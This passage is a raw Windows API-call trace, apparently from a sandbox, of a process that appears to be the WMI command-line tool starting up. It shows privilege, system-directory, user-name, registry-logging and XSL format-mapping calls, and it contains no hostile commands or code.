(Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=2038073000, Attributes=0x2f10), (Luid.LowPart=0x0, Luid.HighPart=3505888, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0074.104] free (_Block=0x3569a0) [0074.104] CloseHandle (hObject=0xf4) returned 1 [0074.105] malloc (_Size=0x40) returned 0x357ee0 [0074.105] malloc (_Size=0x40) returned 0x357f30 [0074.105] malloc (_Size=0x40) returned 0x357f80 [0074.105] malloc (_Size=0x20a) returned 0x3569a0 [0074.105] GetSystemDirectoryW (in: lpBuffer=0x3569a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0074.105] free (_Block=0x3569a0) [0074.105] malloc (_Size=0x18) returned 0x36dfb0 [0074.105] malloc (_Size=0x18) returned 0x3569a0 [0074.105] malloc (_Size=0x18) returned 0x3569c0 [0074.105] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0074.105] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0074.106] free (_Block=0x36dfb0) [0074.106] free (_Block=0x3569a0) [0074.106] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0074.106] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0074.106] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0074.106] FreeLibrary (hLibModule=0x77940000) returned 1 [0074.106] free (_Block=0x3569c0) [0074.107] _vsnwprintf (in: _Buffer=0x357f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x18f8c8 | out: _Buffer="ms_409") returned 6 [0074.107] malloc (_Size=0x20) returned 0x3569a0 [0074.107] GetComputerNameW (in: lpBuffer=0x3569a0, nSize=0x18fca0 | out: lpBuffer="XDUWTFONO", nSize=0x18fca0) returned 1 [0074.107] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.107] malloc (_Size=0x14) returned 0x36dfb0 [0074.107] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.107] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x18fc98 | out: lpNameBuffer=0x0, nSize=0x18fc98) returned 0x7fffffde000 [0074.108] GetLastError () returned 0xea [0074.108] malloc (_Size=0x40) returned 0x3569d0 [0074.108] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3569d0, nSize=0x18fc98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18fc98) returned 0x1 [0074.109] lstrlenW (lpString="") returned 0 [0074.109] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.109] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0074.110] lstrlenW (lpString=".") returned 1 [0074.110] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.110] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0074.110] lstrlenW (lpString="LOCALHOST") returned 9 [0074.110] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.110] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0074.110] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.110] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.110] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0074.110] free (_Block=0x36dfb0) [0074.110] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.110] malloc (_Size=0x14) returned 0x36dfb0 [0074.110] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.110] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.111] malloc (_Size=0x14) returned 0x356a20 [0074.111] lstrlenW (lpString="XDUWTFONO") returned 9 [0074.111] malloc (_Size=0x8) returned 0x356a40 [0074.111] malloc (_Size=0x18) returned 0x356a60 [0074.111] malloc (_Size=0x30) returned 0x356a80 [0074.111] malloc (_Size=0x18) returned 0x356ac0 [0074.111] SysStringLen (param_1="IDENTIFY") returned 0x8 [0074.111] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0074.111] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0074.111] SysStringLen (param_1="IDENTIFY") returned 0x8 [0074.111] malloc (_Size=0x30) returned 0x356ae0 [0074.111] malloc (_Size=0x18) returned 0x356b20 [0074.111] SysStringLen (param_1="IMPERSONATE") returned 0xb [0074.111] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0074.111] SysStringLen (param_1="IMPERSONATE") returned 0xb [0074.111] SysStringLen (param_1="IDENTIFY") returned 0x8 [0074.111] SysStringLen (param_1="IDENTIFY") returned 0x8 [0074.111] SysStringLen (param_1="IMPERSONATE") returned 0xb [0074.111] malloc (_Size=0x30) returned 0x356b40 [0074.111] malloc (_Size=0x18) returned 0x356b80 [0074.111] SysStringLen (param_1="DELEGATE") returned 0x8 [0074.111] SysStringLen (param_1="IDENTIFY") returned 0x8 [0074.111] SysStringLen (param_1="DELEGATE") returned 0x8 [0074.111] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0074.111] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0074.111] SysStringLen (param_1="DELEGATE") returned 0x8 [0074.111] malloc (_Size=0x30) returned 0x356ba0 [0074.112] malloc (_Size=0x18) returned 0x356be0 [0074.112] malloc (_Size=0x30) returned 0x356c00 [0074.112] malloc (_Size=0x18) returned 0x356c40 [0074.112] SysStringLen (param_1="NONE") returned 0x4 [0074.112] SysStringLen (param_1="DEFAULT") returned 0x7 [0074.112] SysStringLen (param_1="DEFAULT") returned 0x7 [0074.112] SysStringLen (param_1="NONE") returned 0x4 [0074.112] malloc (_Size=0x30) returned 0x356c60 [0074.112] malloc (_Size=0x18) returned 0x356ca0 [0074.112] SysStringLen (param_1="CONNECT") returned 0x7 [0074.112] SysStringLen (param_1="DEFAULT") returned 0x7 [0074.112] malloc (_Size=0x30) returned 0x356cc0 [0074.112] malloc (_Size=0x18) returned 0x356d00 [0074.112] SysStringLen (param_1="CALL") returned 0x4 [0074.112] SysStringLen (param_1="DEFAULT") returned 0x7 [0074.112] SysStringLen (param_1="CALL") returned 0x4 [0074.112] SysStringLen (param_1="CONNECT") returned 0x7 [0074.112] malloc (_Size=0x30) returned 0x356d20 [0074.112] malloc (_Size=0x18) returned 0x356d60 [0074.112] SysStringLen (param_1="PKT") returned 0x3 [0074.112] SysStringLen (param_1="DEFAULT") returned 0x7 [0074.112] SysStringLen (param_1="PKT") returned 0x3 [0074.112] SysStringLen (param_1="NONE") returned 0x4 [0074.112] SysStringLen (param_1="NONE") returned 0x4 [0074.112] SysStringLen (param_1="PKT") returned 0x3 [0074.112] malloc (_Size=0x30) returned 0x356d80 [0074.112] malloc (_Size=0x18) returned 0x356dc0 [0074.112] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0074.113] SysStringLen (param_1="DEFAULT") returned 0x7 [0074.113] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0074.113] SysStringLen (param_1="NONE") returned 0x4 [0074.113] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0074.113] SysStringLen (param_1="PKT") returned 0x3 [0074.113] SysStringLen (param_1="PKT") returned 0x3 [0074.113] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0074.113] malloc (_Size=0x30) returned 0x358000 [0074.113] malloc (_Size=0x18) returned 0x356de0 [0074.114] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0074.114] SysStringLen (param_1="DEFAULT") returned 0x7 [0074.114] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0074.114] SysStringLen (param_1="PKT") returned 0x3 [0074.114] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0074.114] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0074.114] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0074.114] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0074.114] malloc (_Size=0x30) returned 0x358040 [0074.114] malloc (_Size=0x40) returned 0x356e00 [0074.114] malloc (_Size=0x20a) returned 0x356e50 [0074.114] GetSystemDirectoryW (in: lpBuffer=0x356e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0074.114] free (_Block=0x356e50) [0074.114] malloc (_Size=0x18) returned 0x356e50 [0074.114] malloc (_Size=0x18) returned 0x356e70 [0074.114] malloc (_Size=0x18) returned 0x356e90 [0074.114] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0074.114] SysStringLen (param_1="\\wbem\\") returned 0x6 [0074.114] free (_Block=0x356e50) [0074.114] free (_Block=0x356e70) [0074.115] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0074.115] free (_Block=0x356e90) [0074.115] malloc (_Size=0x18) returned 0x356e50 [0074.115] malloc (_Size=0x18) returned 0x356e70 [0074.115] malloc (_Size=0x18) returned 0x356e90 [0074.115] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0074.115] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0074.115] free (_Block=0x356e50) [0074.115] free (_Block=0x356e70) [0074.115] GetCurrentThreadId () returned 0x664 [0074.115] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18f5a0 | out: phkResult=0x18f5a0*=0xf8) returned 0x0 [0074.115] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x18f5f0, lpcbData=0x18f590*=0x400 | out: lpType=0x0, lpData=0x18f5f0*=0x30, lpcbData=0x18f590*=0x4) returned 0x0 [0074.115] _wcsicmp (_String1="0", _String2="1") returned -1 [0074.115] _wcsicmp (_String1="0", _String2="2") returned -2 [0074.115] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18f590*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x18f590*=0x42) returned 0x0 [0074.116] malloc (_Size=0x86) returned 0x356eb0 [0074.116] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x356eb0, lpcbData=0x18f590*=0x42 | out: lpType=0x0, lpData=0x356eb0*=0x25, lpcbData=0x18f590*=0x42) returned 0x0 [0074.116] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0074.116] malloc (_Size=0x42) returned 0x356f40 [0074.116] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0074.116] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x18f5f0, lpcbData=0x18f590*=0x400 | out: lpType=0x0, lpData=0x18f5f0*=0x36, lpcbData=0x18f590*=0xc) returned 0x0 [0074.116] _wtol (_String="65536") returned 65536 [0074.116] free (_Block=0x356eb0) [0074.116] RegCloseKey (hKey=0x0) returned 0x6 [0074.116] CoCreateInstance (in: rclsid=0xff747410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff7473f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x18fa98 | out: ppv=0x18fa98*=0x1c071d0) returned 0x0 [0074.525] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1c071d0, xmlSource=0x18fbe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x356e50), isSuccessful=0x18fc50 | out: isSuccessful=0x18fc50*=0xffff) returned 0x0 [0076.990] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1c071d0, DOMElement=0x18fa90 | out: DOMElement=0x18fa90) returned 0x0 [0076.990] malloc (_Size=0x18) returned 0x356e50 [0076.992] free (_Block=0x356e50) [0076.994] malloc (_Size=0x18) returned 0x356e50 [0076.994] free (_Block=0x356e50) [0076.994] malloc (_Size=0x18) returned 0x356e50 [0076.994] malloc (_Size=0x18) returned 0x356e70 [0076.994] malloc (_Size=0x30) returned 0x358080 [0076.995] malloc (_Size=0x18) returned 0x356eb0 [0076.995] free (_Block=0x356eb0) [0076.995] malloc (_Size=0x18) returned 0x35c560 [0076.995] malloc (_Size=0x18) returned 0x35c580 [0076.995] SysStringLen (param_1="VALUE") returned 0x5 [0076.995] SysStringLen (param_1="TABLE") returned 0x5 [0076.995] SysStringLen (param_1="TABLE") returned 0x5 [0076.995] SysStringLen (param_1="VALUE") returned 0x5 [0076.995] malloc (_Size=0x30) returned 0x3580c0 [0076.995] malloc (_Size=0x18) returned 0x35c5a0 [0076.995] free (_Block=0x35c5a0) [0076.995] malloc (_Size=0x18) returned 0x35c5a0 [0076.995] malloc (_Size=0x18) returned 0x35c5c0 [0076.995] SysStringLen (param_1="LIST") returned 0x4 [0076.995] SysStringLen (param_1="TABLE") returned 0x5 [0076.995] malloc (_Size=0x30) returned 0x358100 [0076.996] malloc (_Size=0x18) returned 0x35c5e0 [0076.996] free (_Block=0x35c5e0) [0076.996] malloc (_Size=0x18) returned 0x35c5e0 [0076.996] malloc (_Size=0x18) returned 0x35c600 [0076.996] SysStringLen (param_1="RAWXML") returned 0x6 [0076.996] SysStringLen (param_1="TABLE") returned 0x5 [0076.996] SysStringLen (param_1="RAWXML") returned 0x6 [0076.996] SysStringLen (param_1="LIST") returned 0x4 [0076.996] SysStringLen (param_1="LIST") returned 0x4 [0076.996] SysStringLen (param_1="RAWXML") returned 0x6 [0076.996] malloc (_Size=0x30) returned 0x358140 [0076.996] malloc (_Size=0x18) returned 0x35c620 [0076.996] free (_Block=0x35c620) [0076.996] malloc (_Size=0x18) returned 0x35c620 [0076.996] malloc (_Size=0x18) returned 0x35c640 [0076.996] SysStringLen (param_1="HTABLE") returned 0x6 [0076.997] SysStringLen (param_1="TABLE") returned 0x5 [0076.997] SysStringLen (param_1="HTABLE") returned 0x6 [0076.997] SysStringLen (param_1="LIST") returned 0x4 [0076.997] malloc (_Size=0x30) returned 0x358180 [0076.997] malloc (_Size=0x18) returned 0x35c660 [0076.997] free (_Block=0x35c660) [0076.997] malloc (_Size=0x18) returned 0x35c660 [0076.997] malloc (_Size=0x18) returned 0x35c680 [0076.997] SysStringLen (param_1="HFORM") returned 0x5 [0076.997] SysStringLen (param_1="TABLE") returned 0x5 [0076.997] SysStringLen (param_1="HFORM") returned 0x5 [0076.997] SysStringLen (param_1="LIST") returned 0x4 [0076.997] SysStringLen (param_1="HFORM") returned 0x5 [0076.997] SysStringLen (param_1="HTABLE") returned 0x6 [0076.997] malloc (_Size=0x30) returned 0x3581c0 [0076.997] malloc (_Size=0x18) returned 0x35c6a0 [0076.997] free (_Block=0x35c6a0) [0076.998] malloc (_Size=0x18) returned 0x35c6a0 [0076.998] malloc (_Size=0x18) returned 0x35c6c0 [0076.998] SysStringLen (param_1="XML") returned 0x3 [0076.998] SysStringLen (param_1="TABLE") returned 0x5 [0076.998] SysStringLen (param_1="XML") returned 0x3 [0076.998] SysStringLen (param_1="VALUE") returned 0x5 [0076.998] SysStringLen (param_1="VALUE") returned 0x5 [0076.998] SysStringLen (param_1="XML") returned 0x3 [0076.998] malloc (_Size=0x30) returned 0x358200 [0076.998] malloc (_Size=0x18) returned 0x35c6e0 [0076.998] free (_Block=0x35c6e0) [0076.998] malloc (_Size=0x18) returned 0x35c6e0 [0076.998] malloc (_Size=0x18) returned 0x35c700 [0076.998] SysStringLen (param_1="MOF") returned 0x3 [0076.998] SysStringLen (param_1="TABLE") returned 0x5 [0076.998] SysStringLen (param_1="MOF") returned 0x3 [0076.998] SysStringLen (param_1="LIST") returned 0x4 [0076.998] SysStringLen (param_1="MOF") returned 0x3 [0076.998] SysStringLen (param_1="RAWXML") returned 0x6 [0076.998] SysStringLen (param_1="LIST") returned 0x4 [0076.998] SysStringLen (param_1="MOF") returned 0x3 [0076.999] malloc (_Size=0x30) returned 0x358240 [0076.999] malloc (_Size=0x18) returned 0x35c720 [0076.999] free (_Block=0x35c720) [0076.999] malloc (_Size=0x18) returned 0x35c720 [0076.999] malloc (_Size=0x18) returned 0x35c740 [0076.999] SysStringLen (param_1="CSV") returned 0x3 [0076.999] SysStringLen (param_1="TABLE") returned 0x5 [0076.999] SysStringLen (param_1="CSV") returned 0x3 [0076.999] SysStringLen (param_1="LIST") returned 0x4 [0076.999] SysStringLen (param_1="CSV") returned 0x3 [0076.999] SysStringLen (param_1="HTABLE") returned 0x6 [0076.999] SysStringLen (param_1="CSV") returned 0x3 [0076.999] SysStringLen (param_1="HFORM") returned 0x5 [0076.999] malloc (_Size=0x30) returned 0x358280 [0076.999] malloc (_Size=0x18) returned 0x35c760 [0076.999] free (_Block=0x35c760) [0077.000] malloc (_Size=0x18) returned 0x35c760 [0077.000] malloc (_Size=0x18) returned 0x35c780 [0077.000] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.000] SysStringLen (param_1="TABLE") returned 0x5 [0077.000] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.000] SysStringLen (param_1="VALUE") returned 0x5 [0077.000] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.000] SysStringLen (param_1="XML") returned 0x3 [0077.000] SysStringLen (param_1="XML") returned 0x3 [0077.000] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.000] malloc (_Size=0x30) returned 0x3582c0 [0077.000] malloc (_Size=0x18) returned 0x35c7a0 [0077.000] free (_Block=0x35c7a0) [0077.000] malloc (_Size=0x18) returned 0x35c7a0 [0077.000] malloc (_Size=0x18) returned 0x35c7c0 [0077.000] SysStringLen (param_1="texttablewsys") returned 0xd [0077.000] SysStringLen (param_1="TABLE") returned 0x5 [0077.000] SysStringLen (param_1="texttablewsys") returned 0xd [0077.000] SysStringLen (param_1="XML") returned 0x3 [0077.000] SysStringLen (param_1="texttablewsys") returned 0xd [0077.000] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.001] SysStringLen (param_1="XML") returned 0x3 [0077.001] SysStringLen (param_1="texttablewsys") returned 0xd [0077.001] malloc (_Size=0x30) returned 0x358300 [0077.001] malloc (_Size=0x18) returned 0x35c7e0 [0077.001] free (_Block=0x35c7e0) [0077.001] malloc (_Size=0x18) returned 0x35c7e0 [0077.001] malloc (_Size=0x18) returned 0x35c800 [0077.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.001] SysStringLen (param_1="TABLE") returned 0x5 [0077.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.001] SysStringLen (param_1="XML") returned 0x3 [0077.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.001] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.001] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.001] malloc (_Size=0x30) returned 0x358340 [0077.002] malloc (_Size=0x18) returned 0x35c820 [0077.002] free (_Block=0x35c820) [0077.002] malloc (_Size=0x18) returned 0x35c820 [0077.002] malloc (_Size=0x18) returned 0x35c840 [0077.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0077.002] SysStringLen (param_1="TABLE") returned 0x5 [0077.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0077.002] SysStringLen (param_1="XML") returned 0x3 [0077.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0077.002] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0077.002] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.002] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0077.002] malloc (_Size=0x30) returned 0x358380 [0077.002] malloc (_Size=0x18) returned 0x35c860 [0077.002] free (_Block=0x35c860) [0077.002] malloc (_Size=0x18) returned 0x35c860 [0077.003] malloc (_Size=0x18) returned 0x35c880 [0077.003] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.003] SysStringLen (param_1="TABLE") returned 0x5 [0077.003] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.003] SysStringLen (param_1="XML") returned 0x3 [0077.003] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.003] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.003] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.003] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.003] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.003] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.003] malloc (_Size=0x30) returned 0x3583c0 [0077.003] malloc (_Size=0x18) returned 0x35c8a0 [0077.003] free (_Block=0x35c8a0) [0077.003] malloc (_Size=0x18) returned 0x35c8a0 [0077.003] malloc (_Size=0x18) returned 0x35c8c0 [0077.003] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0077.003] SysStringLen (param_1="TABLE") returned 0x5 [0077.003] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0077.003] SysStringLen (param_1="XML") returned 0x3 [0077.003] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0077.003] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.003] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0077.003] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.004] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0077.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.004] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.004] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0077.004] malloc (_Size=0x30) returned 0x358400 [0077.004] malloc (_Size=0x18) returned 0x35c8e0 [0077.004] free (_Block=0x35c8e0) [0077.004] malloc (_Size=0x18) returned 0x35c8e0 [0077.004] malloc (_Size=0x18) returned 0x35c900 [0077.004] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0077.004] SysStringLen (param_1="TABLE") returned 0x5 [0077.004] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0077.004] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.004] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0077.004] SysStringLen (param_1="XML") returned 0x3 [0077.004] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0077.004] SysStringLen (param_1="texttablewsys") returned 0xd [0077.004] SysStringLen (param_1="XML") returned 0x3 [0077.004] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0077.004] malloc (_Size=0x30) returned 0x358440 [0077.005] malloc (_Size=0x18) returned 0x35c920 [0077.005] free (_Block=0x35c920) [0077.005] malloc (_Size=0x18) returned 0x35c920 [0077.005] malloc (_Size=0x18) returned 0x35c940 [0077.005] SysStringLen (param_1="htable-sortby") returned 0xd [0077.005] SysStringLen (param_1="TABLE") returned 0x5 [0077.005] SysStringLen (param_1="htable-sortby") returned 0xd [0077.005] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.005] SysStringLen (param_1="htable-sortby") returned 0xd [0077.005] SysStringLen (param_1="XML") returned 0x3 [0077.005] SysStringLen (param_1="htable-sortby") returned 0xd [0077.005] SysStringLen (param_1="texttablewsys") returned 0xd [0077.005] SysStringLen (param_1="htable-sortby") returned 0xd [0077.005] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0077.005] SysStringLen (param_1="XML") returned 0x3 [0077.005] SysStringLen (param_1="htable-sortby") returned 0xd [0077.005] malloc (_Size=0x30) returned 0x358480 [0077.005] malloc (_Size=0x18) returned 0x35c960 [0077.005] free (_Block=0x35c960) [0077.006] malloc (_Size=0x18) returned 0x35c960 [0077.006] malloc (_Size=0x18) returned 0x35c980 [0077.006] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0077.006] SysStringLen (param_1="TABLE") returned 0x5 [0077.006] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0077.006] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.006] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0077.006] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.006] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0077.006] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0077.006] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.006] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0077.006] malloc (_Size=0x30) returned 0x3584c0 [0077.006] malloc (_Size=0x18) returned 0x35c9a0 [0077.006] free (_Block=0x35c9a0) [0077.006] malloc (_Size=0x18) returned 0x35c9a0 [0077.006] malloc (_Size=0x18) returned 0x35c9c0 [0077.007] SysStringLen (param_1="wmiclimofformat") returned 0xf [0077.007] SysStringLen (param_1="TABLE") returned 0x5 [0077.007] SysStringLen (param_1="wmiclimofformat") returned 0xf [0077.007] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.007] SysStringLen (param_1="wmiclimofformat") returned 0xf [0077.007] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.007] SysStringLen (param_1="wmiclimofformat") returned 0xf [0077.007] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0077.007] SysStringLen (param_1="wmiclimofformat") returned 0xf [0077.007] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0077.007] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.007] SysStringLen (param_1="wmiclimofformat") returned 0xf [0077.007] malloc (_Size=0x30) returned 0x358500 [0077.007] malloc (_Size=0x18) returned 0x35c9e0 [0077.007] free (_Block=0x35c9e0) [0077.007] malloc (_Size=0x18) returned 0x35c9e0 [0077.008] malloc (_Size=0x18) returned 0x35ca00 [0077.008] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0077.008] SysStringLen (param_1="TABLE") returned 0x5 [0077.008] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0077.008] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.008] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0077.008] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.008] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0077.008] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.008] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.008] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0077.008] malloc (_Size=0x30) returned 0x358540 [0077.008] malloc (_Size=0x18) returned 0x35ca20 [0077.008] free (_Block=0x35ca20) [0077.008] malloc (_Size=0x18) returned 0x35ca20 [0077.008] malloc (_Size=0x18) returned 0x35ca40 [0077.008] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0077.008] SysStringLen (param_1="TABLE") returned 0x5 [0077.009] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0077.009] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0077.009] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0077.009] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0077.009] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0077.009] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0077.009] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0077.009] SysStringLen 